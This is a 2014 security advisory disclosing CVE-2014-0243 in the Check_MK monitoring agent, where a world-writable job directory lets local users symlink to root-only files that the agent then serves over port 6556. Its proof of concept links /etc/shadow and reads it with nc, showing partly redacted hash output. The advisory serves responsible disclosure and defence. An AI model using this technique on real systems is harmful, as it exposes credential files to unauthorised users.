-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===
Check_MK - Arbitrary File Disclosure Vulnerability
- --------------------------------------------------
Affected Versions
=================
Linux versions of Check_MK equal or greater than commit
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.
Other platforms are not affected as the vulnerable feature is not
implemented there.
Issue Overview
==============
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243
Issue Description
=================
While conducting a whitebox test LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. It is not checked if the files are symbolic or hard
filesystem links.
As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.
The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:
<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther <bs@mathias-kettner.de>
Date: Thu Sep 5 15:49:46 2013 +0200
mk-job: /var/lib/check_mk_agent/job directory is now
created with mode 1777 so mk-job can be used by
unprivileged users too: fixing bug #1040
<<>>
The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:
<<>>
# Get statistics about monitored jobs
if cd /var/lib/check_mk_agent/job; then
echo '<<<job>>>'
head -n -0 -v *
fi
<<>>
Impact
======
A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job", pointing to a file he normally would
not have access to like "/etc/shadow". The agent expects output from
jobs using the mk-job Tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.
Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to remove the write
permissions and the sticky bit for non root users temporarily by
setting mode 755 on the directory.
Proof of Concept
================
[myhost]$ pwd
/var/lib/check_mk_agent/job
[myhost]$ ls -l
total 0
[myhost]$ ln -s /etc/shadow
[myhost]$ ls -la
total 4
drwxrwxrwt 2 root root 4096 May 21 15:17 .
drwxr-xr-x 3 root root 4096 Feb 26 13:54 ..
lrwxrwxrwx 1 myuser mygroup 11 May 21 15:17 shadow -> /etc/shadow
[myhost]$ nc 127.0.0.1 6556
[...]
<<<job>>>
==> shadow <==
root:$6$[...]:16133:0:99999:7:::
bin:*:15937:0:99999:7:::
daemon:*:15937:0:99999:7:::
adm:*:15937:0:99999:7:::
lp:*:15937:0:99999:7:::
sync:*:15937:0:99999:7:::
shutdown:*:15937:0:99999:7:::
halt:*:15937:0:99999:7:::
mail:*:15937:0:99999:7:::
uucp:*:15937:0:99999:7:::
operator:*:15937:0:99999:7:::
games:*:15937:0:99999:7:::
gopher:*:15937:0:99999:7:::
ftp:*:15937:0:99999:7:::
nobody:*:15937:0:99999:7:::
[...]
History
=======
2014-05-20 Issue discovery
2014-05-21 Permission of customer for advisory
2014-05-21 Vendor informed
2014-05-22 CVE requested
2014-05-22 Vendor response
2014-05-22 CVE-2014-0243 assigned
2014-05-26 Official fix available
2014-05-27 Advisory release
- --
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschftsfhrer: Oliver Michel, Sven Walther